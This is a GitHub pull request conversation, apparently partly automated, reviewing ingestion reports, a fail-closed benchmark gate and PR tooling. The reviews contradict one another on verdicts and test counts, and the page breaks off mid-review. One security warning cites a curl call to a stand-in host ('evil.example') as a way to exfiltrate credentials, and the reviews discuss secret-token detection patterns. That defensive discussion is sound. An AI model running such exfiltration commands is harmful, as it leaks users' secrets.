feat: add ingestion reports and promotion gates#55
Conversation
e95b4aa to
1360d7f
Compare
|
Closing this PR in favor of consolidated PR #68. Local integration found real helper-block overlap in evolution/skills/evolve_skill.py across the stack, and #68 preserves local test evidence: targeted stack tests 41 passed; full suite 164 passed; GitHub checks were absent on the split PRs. Review #68 instead. |
jarrettj
left a comment
There was a problem hiding this comment.
Performance Review Summary
Scope: Reviewed PR #55 for performance issues like N+1 queries, unnecessary loops, and inefficient algorithms. All 139 tests pass.
Verdict: APPROVED with performance observations 💚
The code is production-ready. Found 4 performance considerations that could be optimized for larger-scale deployments, but none are blocking:
Performance Observations
⚠️ O(N²) Nested Loop in Message Pair Extraction
File: evolution/core/external_importers.py, lines 435-453 (HermesSessionImporter)
for i, msg in enumerate(msg_list): # O(n)
# ...
for j in range(i + 1, len(msg_list)): # O(n) inner loop per message
if msg_list[j].get("role") == "assistant":
# found assistant response
breakImpact: With 100 messages in a session, this could iterate 5000+ times in worst case (1+2+3+...+100).
Suggestion: Single-pass pairing by maintaining state as you walk the message list:
for i, msg in enumerate(msg_list):
if msg.get("role") == "user":
assistant_text = next((m.get("content") for m in msg_list[i+1:]
if m.get("role") == "assistant"), "")Or simplify the loop using deque for O(n) single-pass processing.
⚠️ Filesystem Stat Calls for Sorting
File: evolution/core/external_importers.py, lines 415-418 (HermesSessionImporter)
session_files = sorted(
HermesSessionImporter.SESSION_DIR.glob("*.json"),
key=lambda p: p.stat().st_mtime, # <-- stat() called per file
reverse=True
)Impact: O(n) filesystem syscalls just to get modification timestamps for sorting. With 100 session files = 100 stat() syscalls at startup.
Suggestion:
- If ordering is critical, store
mtimein session JSON alongside messages - If ordering isn't critical, remove the sort (users typically check recent files anyway)
- Alternative: Use
ctimewhich may be cached by os, or defer sorting to a lazy loading pattern
💡 Full Message Loading During Dry-Run
File: evolution/core/external_importers.py, line 690 (describe_source_availability)
def describe_source_availability(sources: list[str]) -> list[SourceAvailability]:
# ...
candidate_count = len(importer_cls.extract_messages()) # Loads ALL messagesImpact: Dry-run operation loads full message history into memory just to count candidates. Unnecessary memory usage for status checks.
Suggestion: Add optional count_only=True parameter to importers:
def extract_messages(limit: int = 0, count_only: bool = False) -> int | list[dict]:
if count_only:
return sum(1 for line in file if line.strip()) # Count without loading💡 Post-Filter Deduplication
File: evolution/core/external_importers.py, lines 746-752 (build_dataset_from_external)
deduped_examples = []
seen_inputs = set()
for ex in examples:
if ex.task_input in seen_inputs:
continue
seen_inputs.add(ex.task_input)
deduped_examples.append(ex)Impact: Second pass through examples for deduplication. Minor redundancy.
Suggestion: Integrate deduplication into RelevanceFilter.filter_and_score() to avoid the second pass:
seen_inputs = set()
for msg in candidates:
if msg["task_input"] in seen_inputs:
continue
seen_inputs.add(msg["task_input"])
# ... scoring logic ...What Looks Good ✅
- No N+1 queries — No database/API calls in loops
- Error handling — Timeout guards on benchmark subprocess execution (good fail-closed behavior)
- Memory efficiency — Output truncation for large benchmark logs (last 4000 chars)
- Test coverage — 139 tests, all passing
- Safe subprocess handling — Using
shlex.split()+capture_output=True, noshell=True - Schema validation — Required fields checked before processing
Recommendation: Merge as-is. All performance considerations are optimizations for scale, not correctness issues. If users report slow imports with large session histories (100+MB), revisit the O(n²) pairing loop and file stat calls.
jarrettj
left a comment
There was a problem hiding this comment.
Performance review complete: approved for merge. See detailed performance observations in separate comment.
jarrettj
left a comment
There was a problem hiding this comment.
Performance Review Summary
Verdict: REQUEST CHANGES
Found 1 performance issue that should be optimized before merge. See detailed inline comments below.
⚠️ Critical Finding: O(n²) Nested Loop in HermesSessionImporter
File: evolution/core/external_importers.py, lines 435-453
The code has a nested loop that scans linearly for each user message. For a session with 100 messages (20 user, 80 tool/assistant), this performs ~1,600 dict accesses instead of optimal ~100.
Suggested Fix: Pre-build an index of assistant positions before the outer loop and reference it instead of scanning.
See detailed suggestions in the inline comments.
Performance Code Review - PR #55Executive SummaryStatus: REQUEST CHANGES Found 1 Performance Issue (O(n²) nested loop) that should be optimized before merge. Rest of code quality is strong. 🔴 Performance Issue: O(n²) Nested LoopLocation: Problem: for i, msg in enumerate(msg_list): # Outer: n iterations
if msg.get('role') != 'user':
continue
# ... validation ...
for j in range(i + 1, len(msg_list)): # Inner: O(n) - NESTED!
if msg_list[j].get('role') == 'assistant':
content = msg_list[j].get('content', '')
if content:
assistant_text = content
breakComplexity Analysis:
Solution: # Before the main loop:
assistant_indices = [i for i, msg in enumerate(msg_list) if msg.get('role') == 'assistant']
# Inside outer loop, replace inner loop with:
for i, msg in enumerate(msg_list):
if msg.get('role') != 'user':
continue
# ... validation ...
# Now O(k) instead of O(n), where k = number of assistants
assistant_text = ''
for j in assistant_indices:
if j > i:
assistant_text = msg_list[j].get('content', '')
break
elif j < i: # Already passed this position
continueThis reduces the inner loop from scanning all messages to scanning only assistant positions. 💡 Non-Critical SuggestionsLine 33, run_report.py: Use from collections import Counter
def _source_counts(dataset: EvalDataset) -> dict[str, int]:
return dict(Counter(ex.source for ex in dataset.all_examples))✅ Strengths
Next Steps
Once optimized, this PR is merge-ready. 👍 |
jarrettj
left a comment
There was a problem hiding this comment.
Code Review Summary: Performance Analysis
Verdict: REQUEST CHANGES — Found 1 critical and 2 moderate performance issues that should be addressed before merge.
🔴 Critical Performance Issues
1. Expensive File I/O in Dry-Run Mode (external_importers.py:690)
The describe_source_availability() function calls extract_messages() for each source to count candidates:
candidate_count = len(importer_cls.extract_messages())Each extract_messages() call:
- Reads JSON/JSONL files from disk
- Parses every entry
- Filters by secret patterns
- Returns full message objects
This is called during --dry-run (line 854), which should be lightweight and just report what's available without extracting all data.
Impact: For a user with large Claude Code/Copilot histories, a dry-run could take seconds unnecessarily, blocking feedback loops.
Suggestion: Create a lightweight count_candidates() method (or flag on extract_messages(limit=1)) that only counts without parsing full messages, or at minimum cache the results within a single run.
⚠️ Moderate Performance Issues
2. String-Based Deduplication (external_importers.py:746-753)
seen_inputs = set()
for ex in examples:
if ex.task_input in seen_inputs:
continue
seen_inputs.add(ex.task_input)Set membership checks on large strings (potentially kilobytes) require hashing and comparison. For datasets with thousands of examples, this could add measurable overhead.
Suggestion: Consider hashing task inputs before deduplication:
seen_hashes = set()
seen_inputs = {}
for ex in examples:
h = hashlib.md5(ex.task_input.encode()).hexdigest()
if h not in seen_hashes:
seen_hashes.add(h)
seen_inputs[h] = exOr use dict-based approach which is more efficient for large texts.
3. Double Iteration for Source Counting (external_importers.py:746-787)
After deduplicating examples, the code iterates again just to count by source:
# First iteration (lines 748-753): deduplication
deduped_examples = []
seen_inputs = set()
for ex in examples: # ← iteration 1
...
# Second iteration (lines 783-787): counting
for ex in examples: # ← iteration 2
source_counts[ex.source] = source_counts.get(ex.source, 0) + 1Impact: O(n) extra pass through potentially large example list.
Suggestion: Combine into single loop:
deduped_examples = []
seen_inputs = set()
source_counts = {}
for ex in examples:
if ex.task_input not in seen_inputs:
seen_inputs.add(ex.task_input)
deduped_examples.append(ex)
source_counts[ex.source] = source_counts.get(ex.source, 0) + 1
examples = deduped_examples💡 Minor Suggestions
4. Source Counting Pattern (run_report.py:33)
The _source_counts() function uses dict.get() pattern:
counts[ex.source] = counts.get(ex.source, 0) + 1While correct, using collections.Counter would be more readable and Pythonic:
from collections import Counter
def _source_counts(dataset: EvalDataset) -> dict[str, int]:
return dict(Counter(ex.source for ex in dataset.all_examples))✅ Looks Good
- Security: Excellent use of
shlex.split()for safe command parsing inbenchmark_gate.py - Timeouts: Proper timeout handling for benchmark commands (300s default, configurable)
- Fail-closed design: Missing fields and errors result in gate failure, not silent pass
- Test coverage: Good test coverage of the gate logic, importers, and edge cases
- Isolation: No remote mutations without explicit flags (--push, --open-pr)
Recommendation: Address the critical dry-run file I/O issue before merge. The moderate issues can be fixed in a follow-up optimization PR. Tests all pass (11/11), and the feature design is solid.
jarrettj
left a comment
There was a problem hiding this comment.
PR Review: feat: add ingestion reports and promotion gates
Verdict: REQUEST_CHANGES — the PR is a well-structured, conservative promotion slice but has a handful of linter issues (unused imports, spurious f-strings) in production code that should be cleaned up before merge. All 150 tests pass. No security or correctness blockers.
Summary
This PR adds three new modules and extends two existing ones to implement auditable promotion machinery:
run_report.py— writes a machine-readable JSON run report + sidecar unified diff on each evolution runbenchmark_gate.py— fail-closed CLI gate that evaluates a run report against configurable thresholdspr_builder.py— local-first PR body generator from a run report (no side effects unless--push/--open-prare passed)external_importers.pyrefactored — adds canonical source metadata, explicit dry-run source availability reporting, and input validation helpersdataset_builder.pyextended —EvalExamplegains optional source provenance fields;from_dictis backward-compatible
1. Correctness ✅
_get()inbenchmark_gate.py: dotted-key traversal is correct; stops cleanly on missing keys and raisesKeyErrorso the caller can convert it to a readable failure message.artifact_growthdenominator usesmax(1.0, baseline_size)— protects against zero-size baseline. Good.cost_increasedenominator usesmax(0.000001, baseline_cost)— asymmetric with the artifact growth guard (which uses 1.0). This means a cost baseline of 0.0000005 would inflate the ratio to ~2000x even with a tiny actual increase. Consider using the samemax(1.0, baseline_cost)sentinel or at minimum documenting why the epsilon differs._parse_copilot_events: the "save previous pair" logic correctly flushes the last user→assistant pair after the loop ends. No missed-last-message bug.HermesSessionImporter.extract_messages: early return inside the inner loop (return messages) works but breaks the outerfor session_file in session_filesloop entirely. This is correct behaviour (the limit is honoured) but is subtly inconsistent with the Copilot importer, which usesbreak+ slice at the caller level. A comment would help.write_run_report:report_dir.mkdir(parents=True, exist_ok=True)— correctly handles first-run directory creation.build_pr_text: accessesreport.get("target", {})safely, but then callstarget.get("name", "unknown-target")without null-guardingtargetitself. Iftargetis explicitly set tonullin the JSON,report.get("target", {})returnsNone, and.get()onNonewill raiseAttributeError. A defensiveor {}pattern (report.get("target") or {}) would fix this.
2. Security ✅
SECRET_PATTERNSregex is intentionally anchored to known key formats to minimise false positives — that's the right trade-off for a pre-filter (the downstream LLM scoring provides a second filter).shlex.split()inbenchmark_gate.pycorrectly sanitises benchmark commands before passing tosubprocess.run()with a list — no shell=True injection risk.subprocess.runusescapture_output=Trueand noshell=True— correct.- The
gho_*GitHub token that will appear in run transcripts is NOT covered bySECRET_PATTERNS. The patternghp_\S+covers GitHub personal access tokens (classic) andghu_\S+covers user tokens, butgho_\S+(OAuth tokens issued by GitHub Apps) is missing. This is a warning rather than a critical issue because session history is unlikely to contain raw OAuth tokens, but the gap is worth closing.
3. Code Quality ⚠️
Warning — ruff reports 10 fixable issues:
In evolution/core/benchmark_gate.py:
import sys— unused import (line 8)
In evolution/skills/evolve_skill.py:
from rich.panel import Panel— unused import (line 18)get_hermes_agent_path— unused import (line 21)LLMJudge,FitnessScore— unused imports (line 24)- Five f-strings without placeholders on lines 78, 81, 124, 139, 192 (spurious
fprefix)
These are all auto-fixable (ruff check --fix) and should be resolved before merge to keep the linter clean.
Suggestions (non-blocking):
benchmark_gate.pyline 75: the loop variablefield_nameshadows thefieldimported fromdataclasseson the same import line (line 9). The shadowing is benign (the loop variable is a string, not the dataclass helper), but renaming the loop variable torequired_fieldwould eliminate the confusion._parse_scoring_jsonbrace-counting parser is a nice hand-rolled solution. Consider a one-line comment explaining whyre.search(r'\{.*\}', …, re.DOTALL)was not used (it breaks on nested braces) — the comment is already in the code but refers to it only indirectly.pr_builder.pyline 59: the test plan hardcodespython -m pytest tests/ -qbut the repository usespytestdirectly (perpyproject.toml). Minor, but consistent tooling references are helpful for reviewers who copy-paste from PR bodies.
4. Testing ✅
- 11 new tests cover all three new modules:
run_report,benchmark_gate(required fields, pass/fail thresholds, CLI exit codes, benchmark command failure, timeout),pr_builder(dry-run, determinism, no git mutation), andexternal_importers(metadata roundtrip, dry-run output, source availability distinction). - Tests correctly use
tmp_path,monkeypatch,CliRunner, andpatch.object— no real filesystem side effects. - The timeout test uses
--benchmark-timeout-seconds 1withtime.sleep(5)— reliable signal. - Missing edge case:
build_pr_textis not tested whenreport.get("target")returnsNone(the null-JSON case noted in Correctness above). A one-line test would close this gap. - Missing edge case:
_parse_scoring_jsonhas no test for the brace-counting slow path; only the fastjson.loadspath is implicitly exercised. Low priority but worth noting.
5. Performance ✅
describe_source_availabilitycallsimporter_cls.extract_messages()with no limit — for large session stores this could be slow during dry-run. TheClaudeCodeImporter.extract_messages(limit=0)already supports alimitparameter; passing a small limit (e.g. 1000) for the availability probe would keep dry-run fast.HermesSessionImporterreads entire session JSON files into memory (json.loads(session_file.read_text())). For very large sessions this could be expensive; streaming is not straightforward with JSON objects but the risk is low in practice.- No N+1 or blocking I/O issues in the hot path.
6. Documentation ✅
- All three new modules have module-level docstrings. Public functions have docstrings with Args/Returns sections.
CHANGELOG/HISTORYfile: not present in this repo, so no stale entry concern.- The PR description is thorough and directly references the issue (#54).
Required fixes before merge
- Remove the 10 unused imports and spurious f-strings flagged by ruff (
ruff check --fixhandles all of them automatically). - Consider adding
gho_\S+toSECRET_PATTERNSinexternal_importers.pyto cover GitHub OAuth app tokens.
Optional improvements
- Guard
build_pr_textagainsttargetbeing JSONnull. - Add a small limit to
describe_source_availability'sextract_messages()call for faster dry-runs. - Rename the
field_nameloop variable inbenchmark_gate.pyto avoid shadowing thefieldimport.
jarrettj
left a comment
There was a problem hiding this comment.
Code Review — PR #55: feat: add ingestion reports and promotion gates
Auth:
ghCLI (jarrettj) · Checkout:fix/54-ingestion-promotion-gates· Suite: 150 passed, 11 warnings (DSPy deprecation only)
⚠️ Warning 1 — describe_source_availability() runs a full extraction for a dry-run count
File: evolution/core/external_importers.py, line 437
candidate_count = len(importer_cls.extract_messages())extract_messages() reads and parses all messages in the source (potentially thousands of Claude Code history entries or Hermes sessions) just to return a count for a dry-run display. Dry-run should be cheap. The path-existence check is already done on the line above; the extraction call contradicts the dry-run spirit and will be slow on large history files.
Suggested fix: Pass limit=1 to confirm the source is non-empty, then report candidate_count as approximate — or add a lightweight count_messages() class method that doesn't build the full list.
⚠️ Warning 2 — Deduplication silently drops cross-source examples with identical task_input
File: evolution/core/external_importers.py, lines 471–477
for ex in examples:
if ex.task_input in seen_inputs:
continue # ← hermes example silently dropped if claude-code had same text
seen_inputs.add(ex.task_input)
deduped_examples.append(ex)If two importers surface the same common question (e.g., "how do I rebase?"), the second-seen example is dropped without logging. This silently biases the training set toward whichever source appears first in the sources list. The PR adds source provenance metadata specifically to make ingestion auditable — the dedup step works against that goal by losing provenance without a trace.
Suggested fixes:
- Log how many examples were dropped:
console.print(f" Deduped {n_dropped} examples with duplicate task_input"). - Consider keying the dedup on
(task_input, source)instead oftask_inputalone, or at least log the dropped count.
⚠️ Warning 3 — GateResult.warnings is declared but never populated
File: evolution/core/benchmark_gate.py, lines 59, 153
warnings: list[str] = []
# ... no warnings.append() anywhere in evaluate_report()
return GateResult(not failures, failures, warnings, thresholds, observed)The warnings field is wired through the dataclass and surfaced in the JSON output, but no code path in evaluate_report ever appends to it. Consumers of the report who check gate.warnings will always see [], making the field dead infrastructure. This is confusing in a security gate context where "passed but with warnings" is a meaningful state (e.g., cost increase approaching but not exceeding the threshold).
Suggested fix: Either add at least one warning-level check (e.g., artifact growth above 80% of the threshold, or cost increase above 80%), or remove the field from the dataclass and the JSON schema until it has a concrete use.
💡 Suggestion 1 — build_pr_text() should catch malformed report JSON gracefully
File: evolution/core/pr_builder.py, line 529
report = json.loads(Path(report_path).read_text()) # raw JSONDecodeError on bad inputA corrupted or truncated report file (e.g., an incomplete write from run_report.py) will produce a raw json.JSONDecodeError traceback. Wrapping in try/except json.JSONDecodeError as e: raise click.ClickException(f"Could not parse report: {e}") gives a friendlier CLI error.
💡 Suggestion 2 — Cost gate epsilon makes zero-baseline cost report misleadingly
File: evolution/core/benchmark_gate.py, line 115
cost_increase = (optimized_cost - baseline_cost) / max(0.000001, baseline_cost)If baseline_cost is 0.0 (a free baseline run), the epsilon floor causes the ratio to be astronomically large even for tiny optimized costs (e.g., $0.001 optimized → 1000× increase, which fails any sane max_cost_increase threshold). Consider explicitly skipping the ratio check when baseline_cost == 0.0 and logging a warning instead.
💡 Suggestion 3 — Timeout test adds wall-clock latency to CI; consider mocking
File: tests/core/test_issue54_promotion.py, lines 1109–1132
The test spawns python -c 'import time; time.sleep(5)' with a 1-second timeout, which is correct for correctness but adds ~1–2 seconds of real wall-clock time to every CI run. Marking it @pytest.mark.slow or replacing the subprocess with unittest.mock.patch("subprocess.run", side_effect=subprocess.TimeoutExpired("cmd", 1)) would keep the coverage without the delay.
💡 Suggestion 4 — Add explicit encoding="utf-8" to run_report.py text operations
File: evolution/core/run_report.py, lines 675, 682, 683, 738
read_text() and write_text() without an explicit encoding default to the system locale, which can vary across developer machines and CI environments. Adding encoding="utf-8" makes the report files locale-independent.
✅ Looks Good
- No
shell=Trueanywhere — benchmark commands are parsed withshlex.split()and passed as anargvlist. Shell injection vector correctly closed, as documented in the PR description. - Fail-closed design throughout — missing required fields, unreadable report files, failed or timed-out benchmark commands all produce
GateResult(passed=False). Exactly right for a promotion gate. --dry-runremains non-mutative —write_report,run_benchmark_gate, andprepare_prare separate opt-in flags with no state mutation on the dry-run path.- Backward compatibility preserved —
EvalExample.from_dictfilters by__dataclass_fields__, so existing JSONL files without the new metadata fields load cleanly. elapsedis correctly in scope — defined atevolve_skill.py:183, well before thewrite_reportblock at line 307; no scoping bug.- Test coverage is solid — 11 targeted tests covering fail-closed gate, timeout, CLI exit codes, dry-run non-mutation, and metadata roundtrip. All 150 suite tests pass locally.
- Secret filtering unchanged and active —
_contains_secret()checks remain in all ingestion paths before anyEvalExampleis created; no regression introduced. _run_gitusescheck=True— git failures inpr_builder.pyraise immediately; no silent pass-on-error.
Verdict
REQUEST_CHANGES — Warnings 1–3 should be addressed before merge. Warning 2 (silent cross-source dedup) is the most impactful because it works against the explicit audit-trail goal of this PR. Warning 3 (dead warnings field) risks misleading operators who look at the gate JSON output. Warning 1 (expensive dry-run extraction) is a UX correctness issue. The four suggestions are optional improvements.
jarrettj
left a comment
There was a problem hiding this comment.
Code Review — feat: add ingestion reports and promotion gates
PR: #55 | Author: @steezkelly | Branch: fix/54-ingestion-promotion-gates
Verdict: REQUEST_CHANGES — two correctness issues and one test gap require attention before merge.
Summary
This PR ships a solid, well-scoped auditable promotion slice. The three new modules (benchmark_gate.py, run_report.py, pr_builder.py) are clean, the fail-closed gate design is correct, deduplication in build_dataset_from_external is a good addition, and describe_source_availability is a meaningful improvement over the previous dry-run behaviour. The test coverage is thorough and well-structured.
The issues below are mostly contained, but two of them could cause silent data loss or incorrect gate results in production.
🔴 Critical
1. _importer_registry() captures HISTORY_PATH/SESSION_DIR at call time, breaking monkeypatching in describe_source_availability
_importer_registry() builds its tuple with the current value of ClaudeCodeImporter.HISTORY_PATH etc. at the moment it is called. describe_source_availability calls _importer_registry() to get both the importer_cls and the canonical path, then does if not path.exists() with that snapshot. If a test patches ClaudeCodeImporter.HISTORY_PATH after the registry is built, the path check uses the stale pre-patch value but the extract_messages() call uses the class attribute (which is patched). This is why test_source_availability_distinguishes_missing_path_from_empty_available_source passes — it patches before calling describe_source_availability — but any test that patches between the registry call and the path check would see divergent behaviour.
More importantly, in production the registry is built once per describe_source_availability call, so there is no real stale-snapshot problem at runtime. However, the function is conceptually broken for callers that want to test non-default paths: path in the status always reflects the class-level default, never a dynamically redirected path. The returned SourceAvailability.path field will show the default system path even when extraction succeeded against a different path. The test that asserts str(history) in result.output only passes because the test patches the class attribute, which also changes HISTORY_PATH for the registry lookup.
Fix: Have describe_source_availability access importer_cls.HISTORY_PATH (or SESSION_DIR) after the patch is applied, rather than reading it from the registry tuple. One clean approach:
_PATH_ATTR = {
"claude-code": "HISTORY_PATH",
"copilot": "SESSION_DIR",
"hermes": "SESSION_DIR",
}
def describe_source_availability(sources):
importers = _importer_registry()
for source in sources:
_, importer_cls, _ = importers[source]
path = getattr(importer_cls, _PATH_ATTR[source])
...2. Silent metadata loss when filter_and_score result is re-deduplicated after the count log line
In build_dataset_from_external, the deduplication block runs after filter_and_score returns and before the "Found N relevant examples" log, which is fine. But the count logged in that line is the deduplicated count. However, the min_dataset_size check and the subsequent split are also computed on the deduplicated list, so the split sizes will be correct.
The real issue: deduplication is on task_input only (exact string match). Two examples from different sessions that differ only in session_id or project but have identical task_input will be collapsed, silently discarding the second one including its metadata. This could silently drop genuine duplicates from different real sessions. While the intent is to avoid feeding the same prompt to the optimiser twice, the current implementation throws away the second record's metadata rather than, for example, keeping the one with the richer metadata (non-empty session_id, repo, etc.).
Fix (minimal): Document the behaviour explicitly in a comment. Fix (preferred): Keep the record that has richer metadata when deduplicating, or deduplicate on (task_input, session_id) to preserve cross-session diversity.
⚠️ Warning
3. benchmark_gate.py imports sys but never uses it
import sys on line 8 of benchmark_gate.py is unused. ruff flags this as F401. Since the main function uses raise SystemExit(1) (which is correct — no sys needed), remove the import.
# Remove line 8:
import sys4. _constraint_to_dict fallback dict(result) will raise TypeError at runtime for non-dataclass ConstraintResult objects
In run_report.py, _constraint_to_dict tries asdict(result) for dataclasses and falls back to dict(result). dict() on an arbitrary object only works if it implements __iter__ yielding key-value pairs (i.e., it is a mapping). A plain dataclass that is not detected by hasattr(result, "__dataclass_fields__") will raise TypeError: cannot convert 'ConstraintResult' object to dict implicitly. The test only exercises the dataclass path. If ConstraintResult is ever subclassed or replaced with a named tuple that lacks __dataclass_fields__, this will fail silently (raising an exception caught by the surrounding try/except in callers, or crashing the report write).
Fix: Add elif hasattr(result, '_asdict'): return result._asdict() for namedtuple support, and document the contract.
5. pr_builder.py embeds the absolute report_path in the test plan section of the PR body
Line 59 of pr_builder.py:
f"- python -m evolution.core.benchmark_gate --report {report_path}",report_path here is the local filesystem path passed to build_pr_text. When this PR body is posted to GitHub, reviewers will see a machine-specific local path (e.g. /Users/alice/output/demo/20260516T120000Z-demo.json). This is confusing and the path will not exist on a reviewer's machine.
Fix: Use Path(report_path).name (filename only) or a relative path, and add a note that the full path is in the run report JSON.
💡 Suggestion
6. describe_source_availability is an O(N messages) call inside what should be a cheap dry-run
The function calls importer_cls.extract_messages() with no limit to compute candidate_count. For a user with a large Claude Code history (thousands of entries) or many Copilot sessions, this will read and parse all session data just to count candidates. This is unexpected for a --dry-run path that is supposed to be cheap.
Suggestion: Pass a generous limit (e.g. extract_messages(limit=10_000)) or expose a separate count_messages() method to keep dry-run snappy.
7. write_run_report default parameter report_dir: Path = Path("reports/runs") is a mutable default
Python evaluates default argument values once at function definition time. Path("reports/runs") is effectively immutable (Path objects are immutable), so there is no practical bug here. However, by convention it is cleaner to use None and resolve inside the function body. This is a minor style point.
8. No test for the pr_builder --push / --open-pr code paths
The mutation paths (_run_git(["checkout", ...]), push, gh pr create) have zero test coverage. The dry-run path is well tested. At minimum, a test that patches _run_git and subprocess.run and asserts they are called with the right arguments would close this gap without requiring a real git remote.
✅ Looks Good
- Fail-closed gate design in
benchmark_gate.pyis correct. Required-field validation returns early before any threshold checks, so a partial report cannot sneak through. shlex.split+shell=Falsein subprocess execution is the right pattern and the PR description is accurate.- The
_message()canonical schema helper eliminates copy-paste duplication across three importers cleanly. EvalExample.from_dictcorrectly filters unknown keys via__dataclass_fields__, preserving backward compatibility with older JSONL files.write_run_reportcorrectly uses UTC timestamps and handles the diff sidecar atomically.- Secret-filtering before dataset persistence is preserved and correctly sequenced.
- Test isolation: all tests use
tmp_pathor monkeypatching — no global state pollution.
Linter output
ruff check found 10 fixable issues, all pre-existing in evolve_skill.py (unused imports, bare f-strings) plus the one new import sys in benchmark_gate.py. None of the new files (run_report.py, pr_builder.py, benchmark_gate.py) have issues beyond the unused sys import.
mypy found one type mismatch in benchmark_gate.py line 147 (dict[str, object] vs dict[str, int | str | None] for the timeout branch of the benchmark result append) and one in run_report.py line 28 (the dict(result) fallback noted above). The dspy import-not-found is a pre-existing environment issue.
Branch checked out
The branch fix/54-ingestion-promotion-gates is now checked out locally. Run:
pytest tests/core/test_issue54_ingestion.py tests/core/test_issue54_promotion.py -q
pytest -q
jarrettj
left a comment
There was a problem hiding this comment.
Code Review — PR #55: feat: add ingestion reports and promotion gates
Reviewer: jarrettj (via automated review workflow)
Summary
Solid, well-structured PR that delivers all three pillars from #54 (auditable run reports, promotion gates, PR body generation) with good test coverage and a clearly non-mutative default execution path. Two issues need attention before the gates are used in production CI.
🔴 Critical — none
⚠️ Warnings (2 — should fix)
[W1] benchmark_gate.py line 8: sys is imported but unused
import sys # ← never referenced anywhere in the fileRuff flags this as F401 (auto-fixable). Any ruff-gated CI run will fail here.
Fix: remove import sys.
[W2] external_importers.py line 690 (describe_source_availability): full import pipeline runs on every --dry-run call
candidate_count = len(importer_cls.extract_messages()) # no limit — full scanextract_messages() reads and parses every session file in the store. On a developer machine with thousands of Claude Code history entries this makes --dry-run as slow as a live run, undermining its purpose as a fast sanity check.
Fix: pass a small limit, or add a separate _probe(limit=100) path:
candidate_count = len(importer_cls.extract_messages(limit=100))
# or: candidate_count = importer_cls.count_candidates()💡 Suggestions (optional)
[S1] pr_builder.py: raw subprocess.CalledProcessError propagates on git push failure
_run_git uses check=True, so a failed git push (no upstream, auth failure, diverged branch) raises a bare CalledProcessError with a noisy traceback. Wrapping in click.ClickException would give a cleaner UX:
def _run_git(args: list[str], cwd: Path | None = None) -> subprocess.CompletedProcess:
try:
return subprocess.run(["git", *args], cwd=cwd, check=True, capture_output=True, text=True)
except subprocess.CalledProcessError as exc:
raise click.ClickException(f"git {args[0]} failed: {exc.stderr.strip()}") from exc[S2] run_report.py line 59: safe_target sanitisation only strips / and space
Dots are preserved, which is harmless in practice (the timestamp prefix prevents ../ formation), but the intent isn't obvious. Consider using re.sub(r'[^\w-]', '-', target_name) to make the sanitisation explicit and exhaustive.
[S3] Deduplication comment
The task_input exact-string dedup added in build_dataset_from_external is correct for identical duplicates. A short inline comment clarifying that near-duplicate detection is intentionally deferred (or not in scope) would help the next reader.
✅ Looks Good
- No shell injection.
benchmark_gate.pyusesshlex.split()+ list-formsubprocess.run(..., shell=False)with per-command timeout and full returncode inspection. Correct approach. - Fail-closed by design. Missing required fields, parse errors, and constraint failures all produce
passed=False. Gate result is written back into the report JSON atomically. - Lazy imports in
evolve_skill.py. The three new modules are imported inside theif write_report:block, so existing evolution runs are unaffected if new code has import-time issues. - Dry-run is non-mutative. Confirmed across all three entry points — no remote mutation happens without explicit
--push/--open-prflags. - Test coverage. 326 lines of tests cover happy paths, CLI exit codes (0 / non-zero), timeout failure, bad benchmark commands, missing report fields, dry-run determinism, and git non-mutation verification. The
monkeypatchapproach on_run_gitis clean. SourceAvailabilitydataclass correctly distinguishes missing-path from empty-but-available, which was the key dry-run gap in the pre-PR code.
Verdict: REQUEST_CHANGES — the unused sys import will break a ruff CI gate, and the full-scan dry-run (W2) is a correctness-of-behaviour issue for the feature's stated purpose. Both are small fixes.
jarrettj
left a comment
There was a problem hiding this comment.
Code Review — PR #55: feat: add ingestion reports and promotion gates
Auth: gh CLI (macOS Keychain)
Branch checked out locally: fix/54-ingestion-promotion-gates
Test run: pytest tests/core/test_issue54_ingestion.py tests/core/test_issue54_promotion.py → 11/11 passed ✅
Full suite: pytest -q → 150 passed, 11 warnings (DSPy deprecation only) ✅
Overall Assessment
This is a well-structured, thoughtfully scoped piece of work. The fail-closed gate design (evaluate_report bails on any missing required field), the shlex-parsed subprocess invocation without shell=True, the dedicated _message() factory, and the deduplication block in build_dataset_from_external are all good engineering decisions. Test coverage is excellent and hits edge cases (timeout, CLI exit codes, dry-run git isolation).
Two issues need to be resolved before this lands on a production branch:
⚠️ Warnings
1. Subprocess inherits full parent environment — secret exfiltration risk (benchmark_gate.py L125–136)
subprocess.run(argv, capture_output=True, text=True, timeout=...) inherits the calling process's environment, including GITHUB_TOKEN, OPENROUTER_API_KEY, OMLX_API_KEY, and any other secrets loaded into the shell. A benchmark command such as curl https://evil.example/ would silently exfiltrate credentials. Since benchmark commands are user-supplied CLI arguments this is not a remote-code-execution vector, but it is an easy foot-gun for anyone who wires this into a CI pipeline with broad secret scopes.
Fix: pass env={} (or a minimal allowlist like {"PATH": os.environ["PATH"]}) to the subprocess.run call.
2. Dead import: import sys in benchmark_gate.py L8
sys is imported but never referenced anywhere in the module. This will be flagged by ruff/flake8 as F401 and should be removed.
💡 Suggestions
3. describe_source_availability extracts all messages just to count them (external_importers.py L437)
candidate_count = len(importer_cls.extract_messages())For a user with a 50k-entry Claude Code history this runs a full parse on dry-run. A limit= cap (e.g. extract_messages(limit=0) already exists — just add a count-only path or accept that this can be slow) would make dry-run snappy. At minimum, document the expected latency.
4. _run_git in pr_builder.py raises raw CalledProcessError (L64–65)
When git push or git checkout -B fails, the user sees a Python traceback instead of a friendly CLI error. Wrapping the call in a try/except subprocess.CalledProcessError as e: raise click.ClickException(e.stderr.strip()) would give a cleaner experience.
5. _constraint_to_dict fallback dict(result) is fragile (run_report.py L38)
If ConstraintResult is neither a dataclass nor directly iterable as key-value pairs, dict(result) raises TypeError rather than giving a useful error. Consider vars(result) as the fallback, or validate the type at the call site.
6. No test for write_run_report when baseline file is missing
The function calls baseline_path.read_text() without guarding. A missing-file case would propagate an unhandled FileNotFoundError. Worth a small test + try/except with a ValueError.
7. reports/runs/ is not gitignored
Machine-readable run reports will accumulate under reports/runs/ on developer machines and CI. Add a .gitignore entry (/reports/runs/) or document whether these artifacts are intentionally committed.
✅ Looks Good
- Fail-closed gate design: any missing required field short-circuits with explicit
failuresentries before any numeric comparisons. Exactly right for an automated promotion gate. shlex.split+shell=False: benchmark command parsing is safe against injection.- Deduplication block in
build_dataset_from_external: clean and in the right place. --dry-runremains non-mutative: verified in tests and code; no remote state touched._message()factory: eliminates the 3×-repeated ad-hoc dict construction and ensures consistent schema across all importers. Good refactor.- Test for git-mutation isolation (
